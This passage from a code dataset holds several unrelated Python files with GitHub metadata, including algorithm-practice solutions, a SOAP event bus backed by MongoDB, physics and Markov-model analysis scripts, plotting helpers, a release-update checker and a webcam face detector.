pid-13999-high\"})\n print(progress_bar + '8/8')\n time.sleep(.5)\n\n hms = datetime.datetime.today()\n print(hms.hour, hms.minute, hms.second)\n time_flow = hms.hour, hms.minute, hms.second\n print(packing)\n\n data = [\n [prom_now + str(\"AMD\"), convert_amd[0].text],\n [prom_day_min, convert_min_amd[0].text],\n [prom_day_max, convert_max_amd[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Intel\"), convert_intel[0].text],\n [prom_day_min, convert_min_intel[0].text],\n [prom_day_max, convert_max_intel[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Apple\"), convert_apple[0].text],\n [prom_day_min, convert_min_apple[0].text],\n [prom_day_max, convert_max_apple[0].text],\n [\" \", \" \"],\n [prom_now 
+ str(\"IBM\"), convert_ibm[0].text],\n [prom_day_min, convert_min_ibm[0].text],\n [prom_day_max, convert_max_ibm[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Microsoft\"), convert_microsoft[0].text],\n [prom_day_min, convert_min_microsoft[0].text],\n [prom_day_max, convert_max_microsoft[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Google\"), convert_google[0].text],\n [prom_day_min, convert_min_google[0].text],\n [prom_day_max, convert_max_google[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Facebook\"), convert_facebook[0].text],\n [prom_day_min, convert_min_facebook[0].text],\n [prom_day_max, convert_max_facebook[0].text],\n [\" \", \" \"],\n [prom_now + str(\"Yandex\"), convert_yandex[0].text],\n [prom_day_min, convert_min_yandex[0].text],\n [prom_day_max, convert_max_yandex[0].text],\n ]\n\n today = date.today()\n time_now = datetime.datetime.time(datetime.datetime.now())\n direction = 'IT_'\n new_data = pd.DataFrame(data).rename_axis(None, axis=1)\n file_name = str(direction) + str(today) + '-' + str(time_flow)\n file_directory = file_name + '.xlsx'\n new_data.style.hide_index()\n writer = pd.ExcelWriter(file_directory, engine='xlsxwriter')\n new_data.to_excel(writer, sheet_name=str(sheet_name) + str(today), index=False)\n\n workbook = writer.book\n worksheet = writer.sheets[str(sheet_name) + str(today)]\n\n format_list = workbook.add_format({'border': 0, 'num_format': 'hh:mm:ss', 'size': 14, 'align': 'center'})\n date_format = workbook.add_format({'num_format': 'mm.dd.yyyy'})\n worksheet.write('A1', time_now, format_list)\n worksheet.write('B1', today, date_format)\n format = workbook.add_format({'align': 'left'})\n\n worksheet.set_landscape()\n worksheet.set_column('A:A', 40, format)\n worksheet.set_column('B:B', 20, format)\n\n writer.save()\n print('\\n''Файл с названием ' + str(direction) + str(today) + '-' + str(time_flow) + ' сохранен')\n\n\neel.start(\"PromDyn.html\", size=(1920, 1080)) # Параметры отображения содержимого в приложении","repo_name":"Berliner187/PromotionsDynamics_Python","sub_path":"GUI PromotionsDynamics/PromDyn.py","file_name":"PromDyn.py","file_ext":"py","file_size_in_byte":19447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22903908552","text":"# Adamın çözdüğü\n# Çözüm sayısı 0 | Hedef 5 çözüm\nclass Solution(object):\n def productExceptSelf(self, nums):\n res = [1] * len(nums)\n\n prefix = 1\n for i in range(len(nums)):\n res[i] = prefix\n prefix *= nums[i]\n # Soldaki rakamları çarpıyor prefix = 1 çünkü solunda rakam yok\n \n postfix = 1\n for i in range(len(nums)-1, -1, -1):\n res[i] *= postfix\n postfix *= nums[i]\n\n return res\n\n\n# Prefixde ilk olarak solundaki sayıları bulup çarpıyor\n# Postfixde ise sağındaki sayıların çarpımını buluyor ve bastırıyor.\n\nprint(Solution().productExceptSelf([1,2,3,4])) ","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes questions/238.py","file_name":"238.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1659859516","text":"def solution(fees, records):\n # 각 차량번호를 키, 값으로 총 주차시간, 출입 시간 저장\n # 만약 출입이면 출입시간에 저장\n # 퇴장이면 출입시간과 비교하여 총 주차시간 계산\n # 퇴장 후 다시 ''으로 변경\n parking_info = {}\n for record in records:\n # 시간, 차량번호, 입출입\n time, num, how = record.split()\n if how == 'IN':\n if num in parking_info:\n parking_info[num][1] = time\n else:\n parking_info[num] = [0, time]\n else:\n st_time = parking_info[num][1].split(':')\n 
time = time.split(':')\n # 시간별 분별 계산 보다, 00:00 기준 몇 분 후인지로 계산\n st = int(st_time[0]) * 60 + int(st_time[1])\n end = int(time[0]) * 60 + int(time[1])\n parking_time = end - st\n # 정보 갱신\n parking_info[num][0] += parking_time\n parking_info[num][1] = ''\n \n # 추가적으로 나가지 않은 차량에 대하여 확인\n # 나가지 않은 차량에 대한 출차 기준 시간은 동일\n end = 23 * 60 + 59\n for num in parking_info:\n if parking_info[num][1]:\n st_time = parking_info[num][1].split(':')\n st = int(st_time[0]) * 60 + int(st_time[1])\n parking_info[num][0] += end - st\n \n answer = []\n for num in sorted(parking_info.keys()):\n total_parking_time = parking_info[num][0]\n # 기본 요금 시간보다 적은지\n if total_parking_time <= fees[0]:\n answer.append(fees[1])\n else:\n fee = fees[1]\n total_parking_time -= fees[0]\n if total_parking_time % fees[2]:\n fee += (total_parking_time // fees[2] + 1) * fees[3]\n else:\n fee += (total_parking_time // fees[2]) * fees[3]\n answer.append(fee)\n return answer","repo_name":"mintropy/algorithm_pulzo","sub_path":"이영준/2021/09/0911카카오코테/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"3792036903","text":"'''\nCreated on Oct 17, 2012\n\nA basic implementation of the RMAS esb specification that uses mongodb as a backend\n\n@author: jasonmarshall\n'''\n\nimport logging\nfrom spyne.decorator import srpc\nfrom spyne.service import ServiceBase\nfrom spyne.model.primitive import Unicode, Boolean\nfrom spyne.model.complex import Iterable\nfrom spyne.util.simple import wsgi_soap_application\nfrom wsgiref.simple_server import make_server\nfrom datetime import datetime\nimport dateutil.parser\nfrom pymongo import Connection\nfrom rmasservicebus.EventValidator import validate_rmas_event\nfrom pymongo.errors import PyMongoError\n\ndatabase = None\nmessage_collection = None\n\nclass RMASService(ServiceBase):\n\n @srpc(Unicode, _returns=Boolean)\n def pushEvent(event):\n '''\n Push an event onto the RMAS bus queue\n @param message a valid RMAS event\n @return whether or not the message was successfully pushed (most likely reason for False is invalid message)\n '''\n logging.info('attempting to push event to the queue: %s' % event)\n \n if validate_rmas_event(event):\n try:\n message = {'event':event,\n 'received':datetime.now()}\n message_collection.insert(message)\n logging.info(\"shoved message in the queue: %s\" % event)\n return True\n except Exception:\n logging.error(\"Failed to add the message to the queue!\")\n pass\n else:\n logging.error('Not a valid message: %s' % event)\n \n return False\n \n @srpc(Unicode, _returns=Iterable(Unicode))\n def getEvents(timestamp):\n '''\n Returns the RMAS events that have been received after the given timestamp\n @param timestamp the ISO-8601 timestamp, messages after this time will be delivered\n @return a list of RMAS events.\n '''\n \n logging.info('call to getEvents with timestamp: %s' % timestamp)\n \n try:\n parsed_timestamp = dateutil.parser.parse(timestamp)\n except ValueError as e:\n logging.error('There was a ValueError parsing the timestamp %s: %s' % (timestamp, e))\n return []\n\n \n #query the messages collection based on the parsed timestamp\n try:\n messages = [message['event'] for message in message_collection.find({\"received\": {\"$gt\": parsed_timestamp}})]\n return messages\n except PyMongoError as e:\n logging.error('An error occurred whilst querying the database: %s'% e)\n\n return []\nif __name__=='__main__':\n \n connection = Connection()\n database = connection.rmas_messages\n 
message_collection = database.message_collection\n \n \n logging.basicConfig(level=logging.INFO)\n logging.getLogger('spyne.protocol.xml').setLevel(logging.INFO)\n\n logging.info(\"listening to http://127.0.0.1:7789\")\n logging.info(\"wsdl is at: http://localhost:7789/?wsdl\")\n\n wsgi_app = wsgi_soap_application([RMASService], 'spyne.examples.hello.soap')\n server = make_server('127.0.0.1', 7789, wsgi_app)\n server.serve_forever()\n \n \n \n \n \n\n","repo_name":"UoK-Psychology/RMAS-ServiceBus","sub_path":"rmasservicebus/esb.py","file_name":"esb.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23445074600","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport math \r\nimport cmath\r\nimport seaborn as sns\r\nimport scipy\r\nimport functools\r\nfrom scipy.linalg import expm\r\n\r\nT = 2\r\nJ1 = ((3*np.pi/4)/(np.sqrt(2)))*(2/T)\r\nJ2 = ((np.pi/2)/(np.sqrt(2)))*(2/T)\r\nJ3 = 0\r\nN = 20\r\n\r\ncm = plt.cm.get_cmap('plasma') #get colorbar\r\n\r\n#calculate the evolution operator\r\ndef Floquet():\r\n hopping_x1 = np.zeros((2*N,2*N))\r\n hopping_y1 = np.zeros((2*N,2*N))\r\n hopping_x2 = np.zeros((2*N,2*N))\r\n hopping_y2 = np.zeros((2*N,2*N))\r\n hopping_xy = np.zeros((2*N,2*N))\r\n hopping_yx = np.zeros((2*N,2*N))\r\n hopping_x3 = np.zeros((2*N,2*N),dtype=complex)\r\n\r\n for i in range(0,2*N-1,2):\r\n hopping_x1[i,i+1] = J1\r\n hopping_x1[i+1,i] = J1\r\n for i in range(1,2*N-1,2):\r\n hopping_x1[i,i+1] = 0\r\n hopping_x1[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_x3[i,i+1] = 0\r\n hopping_x3[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_x3[i,i+1] = 0\r\n hopping_x3[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_y1[i,i+1] = J1\r\n hopping_y1[i+1,i] = J1\r\n for i in range(1,2*N-1,2):\r\n hopping_y2[i,i+1] = 0\r\n hopping_y2[i+1,i] = 0\r\n for i in range(0,2*N-1,2):\r\n hopping_xy[i, i] = -1\r\n for i in range(1,2*N,2):\r\n hopping_xy[i, i] = 1\r\n for i in range(0,2*N-1,2):\r\n hopping_yx[i, i] = 1\r\n for i in range(1,2*N,2):\r\n hopping_yx[i, i] = -1\r\n h1 = np.kron(hopping_x1, np.eye(2*N))+np.kron(hopping_xy, hopping_y1)+np.kron(hopping_x3, hopping_yx)\r\n\r\n for i in range(0,2*N-1,2):\r\n hopping_x2[i,i+1] = 0\r\n hopping_x2[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_x2[i,i+1] = J2\r\n hopping_x2[i+1,i] = J2\r\n for i in range(0,2*N-1,2):\r\n hopping_y2[i,i+1] = 0\r\n hopping_y2[i+1,i] = 0\r\n for i in range(1,2*N-1,2):\r\n hopping_y2[i,i+1] = J2\r\n hopping_y2[i+1,i] = J2\r\n h2 = np.kron(hopping_x2, np.eye(2*N))+np.kron(hopping_xy, hopping_y2)\r\n UF = np.dot(expm(-1j*h1*T/4),np.dot(expm(-1j*h2*T/2),expm(-1j*h1*T/4)))\r\n return UF\r\n\r\ndef main():\r\n eigenvalue, eigenvector = np.linalg.eig(Floquet())\r\n # print(eigenvector)\r\n prob = np.dot(np.conjugate(eigenvector).T,eigenvector)\r\n for i in range(2*N*2*N):\r\n for j in range(2*N*2*N):\r\n if i != j:\r\n prob[i,j] = 0\r\n if i == j:\r\n prob[i,j] = prob[i,j]\r\n conv1 = np.zeros((2*N,2*N*2*N))\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n conv1[i,i*2*N+j] = 1\r\n # print(conv1)\r\n conv2 = np.zeros((2*N*2*N,2*N))\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n conv2[i*2*N+j,j] = 1\r\n # print(conv2)\r\n PROB = np.dot(np.dot(conv1,prob),conv2)\r\n for i in range(2*N):\r\n for j in range(2*N):\r\n PROB[i,j] = float(np.abs(PROB[i,j].real))\r\n sns.heatmap(np.abs(PROB))\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n 
main()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/probdensity.py","file_name":"probdensity.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32125564890","text":"import argparse\nimport estimator\nimport numpy\n\ndef main():\n # Parser de la linea de comandos\n parser = argparse.ArgumentParser(description='Un script para obtener graficas de m, sigmay rho versus el error general e_k')\n parser.add_argument('--plot', help='Tipo de grafica a obtener (m: m vs error, sigma: sigma vs error, rho: rho vs error)', default='m')\n args = parser.parse_args()\n plot_type = args.plot\n\n # Variables\n error_results = []\n title = \"\"\n x_label = \"\"\n\n # Constantes\n y_label = \"Error General [e_k]\"\n tol = 1e-4\n\n # Caso Dimension vs Error\n if plot_type == \"m\":\n title = \"Dimension m vs Error General e_k\"\n x_label = \"Dimension [m]\"\n print(\"Generando la grafica: \" + title)\n rho = 0.5\n sigma = 1\n m_min = 2\n m_max = 100\n step = 1\n n_points = (m_max - m_min)/step\n for m in range(m_min, m_max, step):\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(m_min, m_max, error_results, x_label, y_label, title, n_points)\n # Caso Sigma vs Error\n elif plot_type == \"sigma\":\n title = \"Desviacion Estandar sigma vs Error General e_k\"\n x_label = \"Desviacion Estandar [sigma]\"\n print(\"Generando la grafica: \" + title)\n rho = 0.5\n m = 25\n sigma_min = 0.1\n sigma_max = 5.0\n sigma = 0\n step = 1\n n_points = (sigma_max - sigma_min)*10/step\n for value in range(int(sigma_min * 10), int(sigma_max * 10), step):\n sigma += sigma_min\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(sigma_min, sigma_max, error_results, x_label, y_label, title, n_points)\n # Caso Rho vs Error\n elif plot_type == \"rho\":\n title = \"Constante rho vs Error General e_k\"\n x_label = \"Constante [rho]\"\n print(\"Generando la grafica: \" + title)\n m = 50\n sigma = 1\n rho_min = 0.01\n rho_max = 0.99\n rho = 0\n step = 1\n n_points = (rho_max - rho_min)*100/step\n for value in range(int(rho_min * 100), int(rho_max * 100), step):\n rho += rho_min\n k, error = estimator.solucion_problA(m, rho, sigma, tol)\n error_results.append(error)\n estimator.get_plot(rho_min, rho_max, error_results, x_label, y_label, title, n_points)\n else:\n print(\"ERROR. 
Parametro invalido: \" + plot_type + \".\")\n print(\"Parametros validos: m | sigma | rho\")\n\n\nif __name__== \"__main__\":\n main()","repo_name":"jckruz777/Adaptive_Processing","sub_path":"tarea1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28390569655","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom matplotlib.font_manager import FontProperties\nimport numpy as np\n\ndef plot(data, result, training_set, categories, axis_labels, colors):\n xs = np.array([data[i][0] for i in range(len(data))])\n ys = np.array([data[i][1] for i in range(len(data))])\n cs = np.array([colors[r] for r in result])\n\n fig, ax = plt.subplots()\n\n mo = plt.scatter(xs, ys, c=cs, marker='o')\n\n xs = np.array([training_set[i][0] for i in range(len(training_set))])\n ys = np.array([training_set[i][1] for i in range(len(training_set))])\n cs = np.array([colors[r] for r in categories])\n\n mt = plt.scatter(xs, ys, c=cs, marker='^')\n\n ax.set_xlabel(axis_labels[0])\n ax.set_ylabel(axis_labels[1])\n\n mc = []\n for cat in colors:\n mc.append(mpatches.Patch(color=colors[cat]))\n\n handles = [mo, mt] + mc\n plt.legend(\n handles,\n [\"Classified data\", \"Training data\"] + [cat for cat in colors],\n scatterpoints=1,\n fontsize='small',\n bbox_to_anchor=(0., 1., 1., .024),\n loc=3,\n fancybox=False,\n ncol= 3,\n mode=\"expand\",\n borderaxespad=0.,\n edgecolor='black'\n )\n\n plt.show()\n plt.close(fig)\n\ndef plot_voronoi(voronoi, training_set, categories, axis_labels, colors, show_legend = True):\n from scipy.spatial import Voronoi, voronoi_plot_2d\n voronoi_plot_2d(voronoi, show_points=False, show_vertices=False)\n\n ys = np.array([training_set[i][1] for i in range(len(training_set))])\n xs = np.array([training_set[i][0] for i in range(len(training_set))])\n cs = np.array([colors[r] for r in categories])\n\n plt.scatter(xs, ys, c=cs)\n ax = plt.gca()\n\n ax.set_xlabel(axis_labels[0])\n ax.set_ylabel(axis_labels[1])\n\n if show_legend:\n mc = []\n for cat in colors:\n mc.append(mpatches.Patch(color=colors[cat]))\n\n handles = mc\n plt.legend(\n handles,\n [cat for cat in colors],\n scatterpoints=1,\n fontsize='small',\n bbox_to_anchor=(0., 1., 1., .024),\n loc=3,\n fancybox=False,\n ncol= 3,\n mode=\"expand\",\n borderaxespad=0.,\n edgecolor='black'\n )\n\n plt.show()\n","repo_name":"hausp/INE5443","sub_path":"t1/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69820228533","text":"\nimport pyemma\n\nimport numpy as np\nimport pandas as pd\ntry:\n from sklearn.cross_validation import KFold\nexcept ImportError:\n from sklearn.model_selection import KFold\nfrom sklearn.pipeline import Pipeline\nfrom pyemma.coordinates.clustering import kmeans\nfrom pyemma.coordinates.transform import tica\nimport logging\n\ndef _dict_compose(dict1, dict2):\n \"\"\"\n Example\n -------\n >>> dict1 = {'a': 0, 'b': 1, 'c': 2}\n >>> dict2 = {0: 'A', 1: 'B'}\n >>> _dict_compose(dict1, dict2)\n {'a': 'A', 'b': 'B'}\n \"\"\"\n return {k: dict2.get(v) for k, v in dict1.items() if v in dict2}\n\nclass MaximumLikelihoodMSM(pyemma.msm.MaximumLikelihoodMSM):\n def __init__(self, lag: int, score_k=1) -> None:\n super().__init__(lag=lag, score_k=score_k)\n #self._estimate(dtrajs)\n \n def score_GMRQ(self, dtrajs: list) -> float:\n # eigenvectors from 
the model we're scoring, `self`\n V = self.eigenvectors_right()\n\n # Note: How do we deal with regularization parameters like prior_counts\n # here? I'm not sure. Should C and S be estimated using self's\n # regularization parameters?\n m2 = self.__class__(**self.get_params())\n m2.fit(dtrajs)\n\n if self.mapping_ != m2.mapping_:\n V = self._map_eigenvectors(V, m2.mapping_)\n # we need to map this model's eigenvectors\n # into the m2 space\n\n # How well do they diagonalize S and C, which are\n # computed from the new test data?\n S = np.diag(m2.pi)\n C = S.dot(m2.transition_matrix)\n\n try:\n gmrq = np.trace(V.T.dot(C.dot(V)).dot(np.linalg.inv(V.T.dot(S.dot(V)))))\n except np.linalg.LinAlgError:\n gmrq = np.nan\n\n return gmrq\n \n def _map_eigenvectors(self, V: np.array, other_mapping: dict) -> np.array:\n \"\"\"Mapping correspond\n\n Args:\n V (np.array): right eigvectors\n other_mapping (dict): mapping_ of new model\n\n Returns:\n np.array: [description]\n \"\"\"\n self_inverse_mapping = {v: k for k, v in self.mapping_.items()}\n transform_mapping = _dict_compose(self_inverse_mapping, other_mapping)\n source_indices, dest_indices = zip(*transform_mapping.items())\n\n #print(source_indices, dest_indices)\n mapped_V = np.zeros((len(other_mapping), V.shape[1]))\n mapped_V[dest_indices, :] = np.take(V, source_indices, axis=0)\n return mapped_V\n\n @property\n def mapping_(self) -> dict:\n \"\"\"[summary]\n\n Returns:\n dict: [description]\n \"\"\"\n mapping = {}\n for i, state in enumerate(self.active_set):\n mapping[state] = i\n return mapping\n\nclass TICA(tica.TICA):\n\n @property\n def mean(self):\n n_features = self.data[0].shape[0]\n n_observations_ = 0\n n_sequences_ = len(self.data)\n _sum_0_to_TminusTau = np.zeros(n_features)\n _sum_tau_to_T = np.zeros(n_features)\n for X in self.data:\n _sum_0_to_TminusTau += X[:-self.lag].sum(axis=0)\n n_observations_ += X.shape[0]\n _sum_tau_to_T += X[self.lag:].sum(axis=0)\n two_N = 2 * (n_observations_ - self.lag * n_sequences_)\n means = (_sum_0_to_TminusTau + _sum_tau_to_T) / float(two_N)\n return means\n\nclass MSMPipeline(Pipeline):\n def fit(self, trainData: list) -> None:\n output = trainData\n for name, obj in self.steps[:-1]:\n obj.fit(output)\n if name == 'cluster':\n output = obj.dtrajs\n else:\n output = obj.transform(output)\n _, obj = self.steps[-1]\n obj.fit(output)\n \n def score(self, testData: list) -> float:\n output = testData\n for name, obj in self.steps[:-1]:\n if name == 'cluster':\n output = [ np.concatenate(d) for d in obj.transform(output)]\n else:\n output = obj.transform(output)\n _, obj = self.steps[-1]\n return obj.score(output)\n\n\nclass GMRQValid(object):\n\n def __init__(self) -> None:\n super().__init__()\n\n def tICA_para_nICs(self, data, nICs=None, lag=1, kinetic_map=True, commute_map=False, n_folds=5):\n cv = KFold(n_splits=n_folds).split(data)\n dim = data[0].shape[1]\n if nICs is None:\n nICs = range(5, dim)\n results = []\n #tica = pyemma.coordinates.tica(lag=lag, kinetic_map=kinetic_map, commute_map=commute_map)\n model = MSMPipeline([\n ('tica', tica.TICA(lag=lag, kinetic_map=kinetic_map, commute_map=commute_map)),\n ('cluster', kmeans.KmeansClustering(fixed_seed=43, n_clusters=100)),\n ('msm', MaximumLikelihoodMSM(lag=1))\n ])\n for nIC in nICs:\n print(nIC)\n print(model)\n model.set_params(tica__dim=nIC)\n for foldIndex, (trainIndex, testIndex) in enumerate(cv):\n trainData = [data[i] for i in trainIndex]\n testData = [data[i] for i in testIndex]\n\n trainScore = 0\n testScore = 0\n #try:\n 
model.fit(trainData)\n trainScore = model.score(trainData)\n testScore = model.score(testData)\n #except:\n # logging.warn('Failed train the data for fold %d at nIC %d'%(foldIndex, nIC))\n results.append({\n 'train_score': trainScore,\n 'test_score': testScore,\n 'nIC': nIC,\n 'fold': foldIndex})\n results = pd.DataFrame(results)\n avgs = (results\n .groupby('nIC')\n .aggregate(np.median)\n .drop('fold', axis=1))\n print(results)\n print(avgs)\n #bestN = avgs['test_score'].argmax()\n #bestScore = avgs.loc[bestN, 'test_score']\n #print(bestN, \"gives the best score:\", bestScore)\n return results","repo_name":"Aunity/MDAKit","sub_path":"MDAKit/lib/msmtools/GMRQ.py","file_name":"GMRQ.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13730327983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription:\nClass file for main facial detection\nOpens default webcam and detects faces\n'q' to exit\n\nRun the program like this:\n$ python Face.py\n\"\"\"\nimport cv2\nimport sys, os\n\nclass DetectClass:\n\t\n\t# Get classifier\n\tcascPath = \"haarcascade_frontalface_default.xml\"\t# sys.argv[1]\n\tfaceCascade = cv2.CascadeClassifier(cascPath)\n\n\t# Capture from Camera\n\tvideo_capture = cv2.VideoCapture(0)\n\t\n\tdef __init__(self, **kwargs):\n\t\tprint(\"Powering up!!\")\n\t\t\n\tdef message(self, string):\n\t\tprint(\"Checking for {0}\\n\".format(str(string)))\n\t\n\tdef detect(self):\n\t\twhile True:\n\t\t\t# Capture frame-by-frame\n\t\t\tret, frame = video_capture.read()#FFFFFF\n\n\t\t\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\t\tfaces = faceCascade.detectMultiScale(\n\t\t\t\tgray,\n\t\t\t\tscaleFactor=1.1,\n\t\t\t\tminNeighbors=5,\n\t\t\t\tminSize=(30, 30),\n\t\t\t\tflags=cv2.CASCADE_SCALE_IMAGE\n\t\t\t)\n\n\t\t\t# Draw a rectangle around the faces\n\t\t\tfor (x, y, w, h) in faces:\n\t\t\t\tcv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\t\t\t# Display the resulting frame\n\t\t\tcv2.imshow('Video', frame)\n\n\t\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\t\tbreak\n\n\t\t# When everything is done, release the capture\n\t\tvideo_capture.release()\n\t\tcv2.destroyAllWindows()\n\t\tprint(\"Exit!!\")\n\t\t\n","repo_name":"ANTZ314/raspi","sub_path":"picam/opencv/CamDet1/faceDet1.py","file_name":"faceDet1.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982504155","text":"# coding: utf8\n\nimport csv\n\nfrom System.Collections.Generic import List\n\nfrom Autodesk.Revit.DB import (\n FilteredElementCollector,\n UnitUtils,\n Document,\n MEPSize,\n Material,\n)\nfrom Autodesk.Revit.DB.Plumbing import PipeSegment, PipeScheduleType\n\nfrom pyrevit import script, forms, revit, HOST_APP\n\nif HOST_APP.is_older_than(2022):\n from Autodesk.Revit.DB import DisplayUnitType\n\n LENGTH_UNIT = DisplayUnitType.DUT_MILLIMETERS\nelse:\n from Autodesk.Revit.DB import UnitTypeId\n\n LENGTH_UNIT = UnitTypeId.Millimeters\n\ndoc = __revit__.ActiveUIDocument.Document # type: Document\nlogger = script.get_logger()\n\n\ndef read_csv(csv_path):\n size_set = List[MEPSize]()\n with open(csv_path, \"rb\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\"\\t\")\n headers = next(reader)\n for row in reader:\n nominal_diameter = convert_to_internal(row[1])\n inner_diameter = convert_to_internal(row[2])\n outer_diameter = convert_to_internal(row[3])\n used_in_size_lists = True\n used_in_sizing 
= True\n mep_size = MEPSize(\n nominal_diameter,\n inner_diameter,\n outer_diameter,\n used_in_size_lists,\n used_in_sizing,\n )\n size_set.Add(mep_size)\n return size_set\n\n\ndef convert_to_internal(value, unit=\"mm\"):\n return UnitUtils.ConvertToInternalUnits(float(value), LENGTH_UNIT)\n\n\ncsv_path = forms.pick_file(file_ext=\"csv\")\n\nif csv_path:\n with revit.Transaction(\"Create PipeType from csv\"):\n name = forms.ask_for_string(\n default=\"ScheduleName\",\n prompt=\"Enter a schedule name eg. SDR6 or EN10217-1 serie 2\",\n title=\"PipeTypeCreation\",\n )\n schedule_id = PipeScheduleType.Create(doc, name).Id\n\n size_set = read_csv(csv_path)\n\n materials = [\n (material.Name, material.Id)\n for material in FilteredElementCollector(doc).OfClass(Material)\n ]\n material = forms.SelectFromList.show(\n materials,\n multiselect=False,\n button_name=\"Select material\",\n title=\"PipeTypeCreation\",\n )\n if material:\n material_id = material[1]\n else:\n name = forms.ask_for_string(\n default=\"MaterialName\",\n prompt=\"Enter a new material name eg. PP-R or Steel\",\n title=\"PipeTypeCreation\",\n )\n material_id = Material.Create()\n PipeSegment.Create(doc, material_id, schedule_id, size_set)\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Create.panel/BatchCreation.pulldown/PipeTypeFromCSV.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"30731023167","text":"import pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\n\n# Load Data\ndata = pd.read_csv(\"data/data_ready.csv\", index_col=[0])\ndata_tfidf = data[[\"screen_name\", \"description\", \"name\",'location']]\ndata_tfidf = data_tfidf.fillna(\" \")\ndata_tfidf = (\n data_tfidf[\"screen_name\"]\n + \"//\"\n + data_tfidf[\"description\"]\n + \"//\"\n + data_tfidf[\"name\"]\n + \"//\"\n + data_tfidf[\"location\"]\n)\nX = list(data_tfidf.values)\n\n\nmodel = SentenceTransformer(\"distiluse-base-multilingual-cased\")\nembeddings = model.encode(X, show_progress_bar=True)\nnp.save(\"embeddings/bert.npy\", embeddings)\n","repo_name":"medialab/graines","sub_path":"pipeline ML/_bert_embedder.py","file_name":"_bert_embedder.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6005567877","text":"import re\n\nimport requests\n\nimport pyminflux\n\n\ndef check_for_updates():\n \"\"\"Check for pyMINFLUX updates.\n\n Returns\n -------\n\n code: int\n Success code:\n -1: something went wrong retrieving version information.\n 0: there are no new versions.\n 1: there is a new version.\n version: str\n Version on the server (in the format x.y.z). Set if code is 0 or 1.\n error: str\n Error message. 
Only set if code is -1.\n \"\"\"\n\n # Initialize outputs\n code = -1\n version = \"\"\n error = \"\"\n\n # Get the redirect from the latest release URL\n response = requests.get(\n \"https://github.com/bsse-scf/pyMINFLUX/releases/latest\", allow_redirects=False\n )\n\n # This should redirect (status code 301 or 302)\n if response.status_code in (301, 302):\n redirect_url = response.headers[\"Location\"]\n else:\n error = \"Could not check for updates!\"\n return code, version, error\n\n # Try retrieving the version string\n match = re.search(r\"\\b(\\d+)\\.(\\d+)\\.(\\d+)$\", redirect_url)\n if match:\n x, y, z = match.groups()\n else:\n error = \"Could not retrieve version information from server!\"\n return code, version, error\n\n # Set the version\n version = f\"{x}.{y}.{z}\"\n\n # Transform new version into an integer\n new_version = 10000 * int(x) + 100 * int(y) + int(z)\n\n # Current version\n parts = pyminflux.__version__.split(\".\")\n\n # Make sure that we have three parts\n if len(parts) != 3:\n error = \"Could not retrieve current app information!\"\n return code, version, error\n\n # Transform current version into an integer\n current_version = 10000 * int(parts[0]) + 100 * int(parts[1]) + int(parts[2])\n\n # Now check\n if new_version > current_version:\n code = 1\n else:\n code = 0\n\n # Return\n return code, version, error\n\n\ndef intersect_2d_ranges(first_range, second_range):\n \"\"\"Intersect two 1D ranges (min, max) to get the combined results of two consecutive filtering events.\"\"\"\n out_range = (\n max(first_range[0], second_range[0]),\n min(first_range[1], second_range[1]),\n )\n return out_range\n","repo_name":"bsse-scf/pyMINFLUX","sub_path":"pyminflux/utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} 